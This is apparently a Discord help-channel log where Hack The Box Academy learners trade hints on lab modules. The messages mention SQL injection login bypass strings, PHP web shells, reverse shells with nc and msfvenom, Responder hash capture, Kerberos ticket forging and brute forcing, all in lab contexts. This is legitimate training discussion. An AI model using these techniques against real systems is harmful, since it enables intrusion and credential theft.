not Internet protocol, IP/v4/v6, OSPF, BGP, RIP/V2, eigrp, igrp

none work

I only used it on the Skills Assessment and when I did, I set my proxychains config to socks5 and used sudo with proxychains. Can try sudo first and if that doesn't work can try socks5 if that doesn't make sense, you can DM.

That was it!.... Sudo made the difference for me. bizzare. Thank you so much.

please😇 im stuck like hell

yea you might have to try later, i'm getting ignored for my questions as well.

😦

Hi there. I’m doing the SIEM visualization example 4 and have a question: how can I get the correct date? The date I’m seeing seems to be invalid. And timestamp always shows up as @timestamp per week. I can define a „customize time interval“ of for example „24 hours“ or „1 days“, but that doesn’t seem to change anything.

Are you still stuck on this one? Have you tried everything in the section? I have to get back to work, so if you are still stuck, I'd focus on the sticky part of the section.

Hello. Working on "Skills Assessment - File Upload Attacks" but it seems I'm only getting GET requests from the web form upload and the entire module was focused on POST requests, am I missing something obvious here?

@solar hedge you could DM me

have you tried all buttons?

wow I feel dumb. Thanks, didn't even notice.

thanks for the tip, I've searched the stickey section of the current user but perhaps i'll try other users or try a different terminal type ( powershell v. dos.exe)

Current user should work. That assessment doesn't throw any curve balls.

Can DM if you still can't get it, I can multi task.

Okay, really appreciate the help, thanks a ton!

any recomendations for free cloud vm hosting? Looking to run a Kali or Parrot that I can access from my MacOS or Windows

Has anyone completed the Windows Priv Esc module? Seeking some info on the "Interact with Users" section

Like just a question about the section?

Yes. A questoin about the section. I have put the .scf file in a few directories. So far nothing is happening. Trying to figure out how to get the other user to trigger opening the file

You can DM as to not spoil anything.

sure thing. thanks.

can i get some help withj networking fundamentals module?>
Which protocol manages data routing and delivery across networks?
i've done the whole module but this seem to not accept any syntax
i've done the whole module but this seem to not accept any syntax

not Internet protocol, IP/v4/v6, OSPF, BGP, RIP/V2, eigrp, igrp
none work

Good morning or evening
First question
How can I change id>1 to id=5
How to implement it in
.................................................................
| Admin panel
|
|Username. Unknown' OR '1'='1
|Password. Unknown' OR '1'='1
|
.................................................................

Second question

Instead if doing the entry in the space
.................................................................
https://125.0.0.1:3758 <---------------------Hier
................................................................. |
| Admin panel |
| |
|Username. .... |
|Password. .... |
| |
................................................................. |
Is it possible to injection directly in the URL ->--|

SQL Injection Fundamentals
Using Comments

its Tcp/ip

does someone know the What type of network cable is used to transmit data over long distances with minimal signal loss? also in the network fundamentals - components of a network?

Same question..

optic-fiber

thankyou so mcuh my dude

optic-fiber , it's that dam'n hyphen

oooooh thanks 🙂

I swear... htb academy sometimes... Thanks a lot!

nwm still doesnt work

idk what im doing wrong

can someone help me with Intro to C2 Operations with Sliver -> SA-> Q4. I have completely looted SRV09 and now I need to abuse the domains trust somehow. I guess I need to make a diamond or gold ticket, I have done both but I can't access DC01. Can someone in DM check if I am doing this correctly or if I am missing something?

@hexed ferry does it give anything with --show?

or is it saying exhausted?

nope. Says exhausted

what module?

are you sure it can get cracked?

Sorry. Not a module. I am practicing for the cpts and I have an AD environment set up. I am literally the one who set the password and I'm going through the motions to make sure I'm doing things right. I even double checked...

yeah not sure tbh try john to see if its a hashcat issue

john doesn't see it either lol

you put it straight to a output file right?

only thing i can think of is the formatting

yeah. I'll do some more digging... but the format is good

sorry for the late reply did u get it?

Nah :/

Fiber-optic is the correct one sorry mate

I tried it so many times

Its the 5th day now

i coppy and pasted the correct answer from my screen

this syntax should work i think

YES THANKS

way to go my dude!

Hi, i got stuck on this question, someone can help me?:

Windows Event Logs & Finding Evil Module
Analyzing Windows Event Logs En Masse

Utilize the Get-WinEvent cmdlet to traverse all event logs located within the "C:\Tools\chainsaw\EVTX-ATTACK-SAMPLES\Lateral Movement" directory and determine when the \*\PRINT share was added. Enter the time of the identified event in the format HH:MM:SS as your answer.

on CPTS exam is there a lot of time consuming password brute force? The module is hard takes a lot of time even when using the other services.... takes time even if I already know the password....

No one can answer that without revealing exam info. If it's in the path, you might see it in the exam

i uploaded a php webshell it is not executing php

that's odd if it doesn't work..

check the web if its running php

What module? Are you sure the extension is valid

module = attacking common services section = skill assessment easy

i am usingn wwwolf-php-webshell

I don't recall using a specialized shell, just basic php shell

i tried basic reverse shell . when going to the url it is downloading the shell and not executing it

Then are you sure that a revshell is the way? :)

If it's not executing a basic php shell, why would an advances one work?

i reached to the forum and people there are saying they can execute commands via webshell so tried webshell

Everything you need to know to pass is given by the module

ok

Does anyone know if HTB asks me to pwn the machine through the Windows virtual box when I'm in a module? I connect with XFree, but when I spawn the IP from the last section, the Windows virtual box closes. Does anyone know why?
It's the buffer overflow module.

Stack-Based Buffer Overflows on Windows x86

When you spawn a target in a diff section it kills any other target

It's to prevent the servers from getting bogged down

Ok , but how do I connect it through the Windows Virtual Box?

You don't?

no , Tip: If you want to download the assessment.zip file to the Windows VM for debugging, right-click on the button below, and select 'Copy Link', then download it in PwnBox and copy it to the remote server.

in windows vm

and is a different section

I meant that you're not gonna be able to. Period

Not questioning that you haven't tried. Its just literally not possible to do so

Okey and how pwn it?

xd

Use your own windows machine/vm to compile and not rely on htb to spoonfeed you dev boxes

Hello, I’m new to this field and trying to learn. I have a question:
Can I ask for help here in solving a certain machine, or is it not allowed?

Ok, tysm marciele

You may ask for hints and nudges in #boxes if you don't have access to the channel get verified, instructions ---> #welcome

To avoid spoiling boxes only specify the box and the section where you need help e.g.

Looking for nudge on dog root

And take it to DMs when someone replies

You mean academy module? If not then #boxes, read and follow #welcome to access. The latest 2 boxes have their own dedicated channels

hey i cant ssh to the machine , i check the access to the ip of the machine by ping yes it pinged .
module: Introduction to Windows Command Line section: User and Group Management

Don't reveal hashes for modules

Sorry about that

Hey everyone. Currently having issues with the following module because the box keeps going offline or something and won't respond to pings. This also happened for one of the previous tasks within the same module but was able to work around it by brute forcing the login with the attack box, however I'm not so fortunate this time around. So far I've used smtp-user-enum to get the user but now when trying to brute force the pw I get a bunch of connection related errors on both my personal kali VM + the Parrot attack-box from htb.

Module - Attacking Common Services - Skills Assessment - Easy

it'll respond to pings every once in awhile then when i try to resume from where i left off it just falls off again after a few seconds

i should also mention i've tried resetting the box prob 4 of 5 times now but no luck :/

Try a different VPN

My VPN too stops working after a while, so switching it just fixes it

this is working well so far for me. ty for the assist m8

All good bro!

Hey all, just starting my HTB journey. Is the Silver annual membership worth it? I definitely need some hand holding. I tried TryHackMe and wasn't a huge fan.

the walkthrough isn't really hand-holding so much as it is here's the solution it doesn't break it down at all

would be nice to have them be more explanatory but yk it is what it is

darn that is disappointing

I'll have to use YouTube for guidance

well any modules above tier 0 shouldn't have guides online

:)

as per the ToS

https://help.hackthebox.com/en/articles/5188925-streaming-writeups-walkthrough-guidelines

Agreed haha I'm not even tier 0 yet

imho the annual sub is worth it for the access to the walkthrough if you truly get stuck and swear you're doing the right thing

I would probably only get it if there is some sort of break down

I'm doing Linux fundamentals now and I know I need to read through everything, it is just overwhelming haha

quick question!

is this a thing: when you use sqlmap, identify the current user as dba which has file permissions... and then you cant read or write files.. but with the manual sqli, it works?

i have not confirmed that it works with the manual sqli, just wanna know if it's a possibility before i do it

In an assessment, like the one in the Documentation module, let's say I find 4 paths from unauthenticated user to Domain Admin, with different starting points (e.g. LLMNR poisoning, AS-REP roasting, weak local admin password, password in Description field), I assume I just need to pick one for the "Walkthrough" and use the others as "Findings". Are there any considerations as to which path is the one I should pick, given that they all start and finish in the same place, and would thus seem equally critical?

In web proxies skills assessment the question

Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)

i did select a position next to the cookie
and on payload processing i listed a prefix of the decoded cookie
and added both encodings in the reverse order

nothing is working tho every request is the same size
or should i md5 crack all 60 requests?

You should add the 31 characters as a prefix then re-encode with the reverse order

Your whole cookie should be replaced, not just the one character, if you check the requests you'll see why

what should i submit as my answer the cookie or
the decoded cookie?

since now i'm starting to get "Resopnse Recieved" with various numbers unlike the first time

Check the response tab :)

Omg thank you so much i thought we should submit the cookie LOL
now i solved it thank you so much

Hi guys sorry for disorder, i have just finished the "Web Service & API attacks" module, and i have red on the forum that there is a way to finish the skill assessment with sqlmap. Can someone explain me please? beacause i have done it with a manual exploiting and i have also tried with sqlmap but it says me connection timeout and i don't know how to do.

Hi, Im new silver memership too, have you done the setting up module? In the windows section it gives a link to download a set up windows vm, but I went to it and it said download unavailable....do you know where I can get something similar? I dont want to download something thats going to wreck my computer....thanks

Unfortunately microsoft has disconitnued public support for the windows dev environments so you'll just have to download a normal windows iso, windows 10 for instance

ah, i see. thanks

Could also install windows server instead if you want to experiment with AD and stuff, though not required

why is like that if i run responder on pwnbox for llmnr poisioning it work but when i use my own machine it didnt give me any hashes...

even giving right interface..

Which module and section this for?

Depends on your host machine's config, there might be ports in use that responder cant use and make sure to run with sudo

like AD assesment part 2 . in that I piviot myself through given pwnbox to the internal network..

You mean you pivot through a target?

pivoting is gonna be hard to steal hashes passively without forwarding ports

yes

okay

hello

I've been using the Windows 11 Evaluation Edition (free/unrestricted use for 90 days) in VMWare Workstation Pro (also free): https://www.microsoft.com/en-us/evalcenter/evaluate-windows-11-enterprise

Hey everyone, This is my first time using Discord for Hack The Box – I usually just read other messages. I'm currently working on the Information Gathering (Web Edition) lab, and I need some help. I've completed everything except for finding the email. After some research, I discovered that it’s on d***.w***.inlanefreight.htb:port. However, despite my attempts, I’m unable to locate it. I’ve used ZAP for crawling and modified ReconSpider to allow scanning beyond just ports 80 and 443, but still no luck. I also added the domain to the appropriate file for resolving the correct IP with FinalRecon, and I found a lot of information in the harvest, including the correct IP, but still no success. Any help or suggestions would be greatly appreciated! Also, if anyone is working on the same labs and wants to collaborate and help each other out, feel free to reach out. Thanks in advance!

try ./req

Section: Windows Privilege Escalation Skills Assessment Part 1
Hi, I'm currently trying to escalate my privilege with JuicyPotato. I able to obtain the correct CLSID but somehow the nc from my attacker machine isn't receiving any connection.

I think you need to add a space

You might be running cmd/c nc.exe

what about in bash?

Need help on the Footprinting medium lab if anyone is here rn

no luck and I've also tried to craft a reverse_shell .bat to get reverse shell still receive nothing

SMB is not working kike literally cannot connect due to "No workgroup available"

I should be doing everything correctly so im a tad lost

dm what you tried

Pdf

what does the command look like

nevermind figured it out

forgot to get rid of the -L flag

Can you please help me? My problem is that the exercise above doesn't seem to work correctly, as it returns incorrect results. Use your browser's developer tools to see what request it sends when searching, and use cURL to search for "flag" and get the flag. I tried to follow it step by step, but I can't find the flag.

which module and section is this?

web request

what have you tried so far?

ctrl + shift + e In the console try curl -u admin:admin (web page) -v

curl 'http://94.237.59.30:47822/script.js' -H 'Authorization: Basic YWRtaW46YWRtaW4='

and I entered the web page in the network and I can't find the search.php. Well, I don't know how to do it to see it. I checked each one in the network.

I'm trying to read the entire page in the console and I still can't find the flag or am I missing something?

php files are usually hidden since they're on the backend, try accessing it anyway and providing the search parameter the question tells you to

just tested it and it is in fact on the target you gave

I think I'm going to have to improve my comprehension when I read.

/search.php?search=$ cannot be...

Hello Guys, i'm new comer and doing setting up module, i'm bit shame about my question, I never download smthg from github, I would like to install pwndoc on windows, but not so easy, anyone to teach me this please ? thanks

Hi Guys so I'm doing the Getting Started module and in the Service Scanning section the only reason I know the user is because they give it to me but is there a way of getting that user and password? am I going to see that later one?

no shame in asking

download git for windows, and run git clone https://github.com/pwndoc/pwndoc

an easier way if you're on a linux is to clone the repo directly, zip it and transfer to your windows over a python http server

thanks man !

i'm not so familiar with Linux, have to practice with this one

https://www.stationx.net/how-to-create-a-virtual-hacking-lab/

follow the first part

Nobody is online right now that can help :/

Just be patient, what's your question?

It took me a while but finally I got this answer: curl -u admin:admin 94.237.59.30:41068/search.php?search=le
Leeds (UK)
Dudley (UK)
Leicester (UK)
Newcastle (UK)
Los Angeles (US)
Jacksonville (US)
Seattle (US) I thought I had it solved, I tried but failed again XDDDD

Read the question again

rsa key is not working

read and understand EVERY WORD

There an error? or something?

and i am almost absolutely certain i have it correctly pasted

without any ghost lines or anything

Now calm down xDD

permission denied (publickey) ; erorr in librcrypto

show command

ssh -i (file) user@ip

permissions for the rsa file is 600

so i dont think its that

you using the private key?

is your openssl updated?

sometimes a libcrypto error means that

i found it on a mailbox a

all it contained was the key

im using pwnbox it should be i imagine

your key contains
----BEGIN
<RSAKEY>
---END
?

It needs to contain begin and end? oh hell that might be why

yes LOL

Sorry for making you angry xD

Dont paste flags

@fervent lantern don't share the flag :)))))))))))))))))))

Oh sorry again I didn't know I won't do it again

okay okay

sorry

1. against ToS
2. spoils for others
3. allows others to just copy your answer without learning anything

no more hack the box at 2 am

i spent 30 minutes on that 😭

won't make the mistake again

7 hours for a response and I almost got banned for my stupidity xD

😢

took you 7 hours to follow instructions that're all literally on the module?... mans gotta work on his comprehension fr

xd

yes xd

nah, not a ban (yet)

just a simple warning; we all get caught up in excitement

im almost certain this is the second time I’ve made this error but I caught it on the first go

then write it in your notes

I am doing the Login Brute Forcing module section Brute Force Attacks question "After successfully brute-forcing the PIN, what is the full flag the script returns?" Using pin-solver.py it brute forces pins 0000-9999 but its running so slow I don't think I will complete the brute force in time currently running at 200 attempts every 5 minutes. I tried using my home lab, pwnbox switching the vpns between tcp and udp. (Fixed seems running PWNBox on the US server did the trick, running Pwnbox on AU slow and running US VPN from oceania on my home lab was slow, reduced the rtt from 300ms to 150ms i.e 1000 req per 10 mins to about 1000 per 5mins after playing around a bit with the vpn make sure your latency to the vpn server is low (top right in pwnbox) had mine around 9ms and it ran super fast)

Unsure if there is something else at play that I am missing?

I see here it should take 3-5 minutes.

Hi all I am currently working on "AD Enumeration & Attacks - Skills Assessment Part II" and the sql01 seems to be offline via ping and port 1433 is this intended?

did you change the ip and port in the script?

Yes,

My ping rtt is 300ms would that impact it?

¯_(ツ)_/¯

shouldn't impact too much

hay @fathom pendant This is my first time using Discord for Hack The Box – I usually just read other messages. I'm currently working on the Information Gathering (Web Edition) lab, and I need some help. I've completed everything except for finding the email. After some research, I discovered that it’s on d.w.inlanefreight.htb:port. However, despite my attempts, I’m unable to locate it. I’ve used ZAP for crawling and modified ReconSpider to allow scanning beyond just ports 80 and 443, but still no luck. I also added the domain to the appropriate file for resolving the correct IP with FinalRecon, and I found a lot of information in the harvest, including the correct IP, but still no success. Any help or suggestions would be greatly appreciated!

you shouldn't need to modify the ReconSpider tool

the one given by the module works just fine for outputting the results.json which would contain it

if you got the new api key; it would have been in the same results.json

:)

thank you so much so much

next time: please don't @ me

and just ask and wait for an answer

got it sorry about that

also ReconSpider gh tool is not the same as the ReconSpider.py tool in the module from creepy crawlies section

@main ridge are u sure the wifiphisher is the way for the second flag i am still stuck here but yet dont see any other way this would be achieved

got it thanks again

this was a great module

yowhy cant i talk in general chat

read and follow #welcome instructions

Yes, used msfvenom linux payload, started netcat listener. Short connection was problem I had. So, when I started netcat listener, I immediately wrote cat flag.txt so flag printed immeadiately before shell connection was lost.

Been stuck with this for a week saw the solution that came out and for some reason it uses hostapd-mana for the ap and wifiphisher in conjunction and works perfectly. Cant understand how it solved my problem since that was that the connected clients didnt donwload the payload but it did.

Thanks though

Can someone help me with: Pki-esc1 , I was able to successfully get a cert.pem however I am unsure how to get the right one over to my Kali box in order to convert it, etc. Where would I find the updated cert.pem file on Bob and send it over to Kali.?

To whoever designed the shells&payloads skills assessment to require the use of RDP: I hate you

all in all though good module.

I just used the kali machine they provide you in that module as a pivot and tunneled everything from my machine with ligolo.

Makes the module much nicer imo, I too hated rdp

Even sshuttle would work and its super fast to setup

hy i did dynamic port fordwading but why it not working , did i somethin wrong .
https://academy.hackthebox.com/module/158/section/1426

You can't use ICMP across proxychains.

It's not built for that.

How i get to know which things we can do and what we can't

Time/experience.

Another limitation is that it needs full packets, so a SYN scan from nmap won't work.

ok

what this in nmap it also say host down?

because it tries to ping it, and as we just discussed, it can't. you have to use -Pn (as it tells you)

ok got it .

hey i cant ssh to the machine , i check the access to the ip of the machine by ping yes it pinged .
module: Introduction to Windows Command Line section: User and Group Management

bro what one machine gonna be <InternalIPofPivotHost> from these 3 .
middle one 1 guess??

does it show 22 in nmap scan?

yes

╭─kali@kali ~ 
╰─$ ssh mtanaka@10.129.203.105
Connection reset by 10.129.203.105 port 22
╭─kali@kali ~ 
╰─$ nmap 10.129.162.12810.129.203.105                                                             255 ↵
╭─kali@kali ~ 
╰─$ nmap 10.129.203.105                                                                           255 ↵
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-14 14:28 CET
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 9.60% done; ETC: 14:28 (0:00:09 remaining)
Nmap scan report for 10.129.203.105
Host is up (0.084s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 6.19 seconds

The middle one is the pivot host and has both internal and external IPs

ok thz

Hey! Working on Legacy right now and struggling to get an exploit to work new to all this and some help would be greatly appreciated. Feel free to DM! Thanks

General question: how can responder (smb) work on servers where shares exists? Doesnt the share block port 445 so that the responder can not intercept hashes on 445?

better to use ligolo-ng pivoting tool, makes life so much easier.

what is the intended route for https://academy.hackthebox.com/module/77/section/859

or are you meant to get root before user

Actually good question, if you ever find out please @ me

It was a solution to one of the modules I just completed so I guess it just works and no one wondering 🤷🏻‍♂️

In the PHP Web Shells module I cannot find the same Proxy Settings Connection settings anywhere, the only one I can find in burp suite is Settings/Tools/Proxy/Proxy listeners as it is not describe how you got to Connection Settings> .... Found the answer by forwarding a few times as per the notes! Oops

Working on the skills assessment for Web Service and API attacks, I have the SOAP request and python script generated correctly. But cannot figure out how to inject. The script hangs when I run it without injection, but when I try to enter a payload I get syntax errors, I’ve tried every basic SQLi I can think of. Any tips or pointers?

guys ive been stuck on this module for like 2 whole days (using web proxies skilll assesment : the question is : + 5 Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload) : ive encoded the payload and added a prefix of the decoded cookie and than fuzzed with the burp intruder for 200 response but got nothing

Maybe I'm wrong but as far as I know the responder intercepts the authentication requests that computers make to resolve host names on the network and does not depend only on port 445, but by 137, 138, 139 (NetBIOS) or 5355 (LLMNR).

Yeah but normal cifs services run on the same ports 🤔

Moreover the question: should you run responder on every endpoint you get admin access to even if its on the same L2 network?

i found the problem. I just had to put the full path to the file. Thanks though

What would you guys recommend taking the exam of first
CBBH or CPTS?
i have both vouchers and idk which one to start with since when i finish CPTS i pretty much would be done with CBBH aswell except for a few modules that i can do in a few days

?

they both have different focuses, so it's whichever you want first

I would focus more on understanding the module over speeding through it

Just look at the hint and do exactly what they say
after that look at the response and you should be done

Guys who knows how to transfer files from windows machine to linux?

Totally thats what im doing thats why ive been stuck in active directory module for 2 weeks i think lol

i did what they sayed

Look at the File transfer module

no respoonse from the intruer

Then you did something wrong

burp intruder

idk what i did wrong tho

i did it yesterday in Burp intruder

are you re-encoding the whole cookie? or just part of it

you should replace the whole cookie with your payload

after decoding the cookie u need to re-en code it again ? they say encode only the payload